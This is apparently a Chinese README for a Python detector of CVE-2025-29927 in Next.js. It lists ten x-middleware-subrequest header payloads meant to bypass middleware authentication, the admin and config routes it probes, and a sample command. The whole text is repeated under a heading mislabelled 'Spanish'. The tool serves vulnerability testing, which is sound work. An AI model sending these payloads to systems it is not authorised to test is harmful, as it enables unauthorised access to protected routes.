CVE-2025-29927 检测器
📌 简介
此脚本通过测试 x-middleware-subrequest 请求头中的多种 payload,检查 Next.js 服务器是否存在 CVE-2025-29927 漏洞,以检测未授权访问。
❓ 什么是 CVE-2025-29927?
CVE-2025-29927 是一个允许绕过 Next.js 安全限制的漏洞,可在无需身份验证的情况下访问敏感路由。
⚙️ 脚本工作原理
🔹 1. 导入库
该脚本使用:
🛠️ argparse - 用于处理命令行参数。
🌐 requests - 用于发送 HTTP 请求。
⏳ time - 用于在测试之间暂停。
🎨 colorama - 用于为控制台输出添加颜色格式。
🔹 2. Payload 列表
该脚本测试 x-middleware-subrequest 中的多种 payload,这些 payload 旨在绕过安全限制。示例:
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. 敏感路由
该脚本会分析响应中是否存在以下路径:
/admin, /dashboard, /settings, /private, /config
🔹 4. 扫描过程
✅ 在控制台中显示横幅。✅ 使用不同的 payload 发送 HTTP 请求。✅ 检查服务器是否使用 Next.js。✅ 检测对敏感路由的访问并报告漏洞。
🔹 5. 错误处理
该脚本会处理异常,以避免因连接失败而导致中断。
🚀 使用示例
使用以下命令运行脚本:
python script.py -t https://example.com/api/auth
📢 免责声明
此工具仅用于伦理测试和授权使用。未经授权对第三方系统使用是违法的。
===================西班牙语===================
CVE-2025-29927 检测器
📌 简介
此脚本通过测试 x-middleware-subrequest 请求头中的多种 payload,检查 Next.js 服务器是否存在 CVE-2025-29927 漏洞,以检测未授权访问。
❓ 什么是 CVE-2025-29927?
CVE-2025-29927 是一个允许绕过 Next.js 安全限制的漏洞,可在无需身份验证的情况下访问敏感路由。
⚙️ 脚本工作原理
🔹 1. 导入库
该脚本使用:
🛠️ argparse - 用于处理命令行参数。
🌐 requests - 用于发送 HTTP 请求。
⏳ time - 用于在测试之间暂停。
🎨 colorama - 用于为控制台输出添加颜色格式。
🔹 2. Payload 列表
该脚本测试 x-middleware-subrequest 中的多种 payload,这些 payload 旨在绕过安全限制。示例:
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. 敏感路由
该脚本会分析响应中是否存在以下路径:
/admin, /dashboard, /settings, /private, /config
🔹 4. 扫描过程
✅ 在控制台中显示横幅。✅ 使用不同的 payload 发送 HTTP 请求。✅ 检查服务器是否使用 Next.js。✅ 检测对敏感路由的访问并报告漏洞。
🔹 5. 错误处理
该脚本会处理异常,以避免因连接失败而导致中断。
🚀 使用示例
使用以下命令运行脚本:
python script.py -t https://example.com/api/auth
📢 免责声明
此工具仅用于伦理测试和授权使用。未经授权对第三方系统使用是违法的。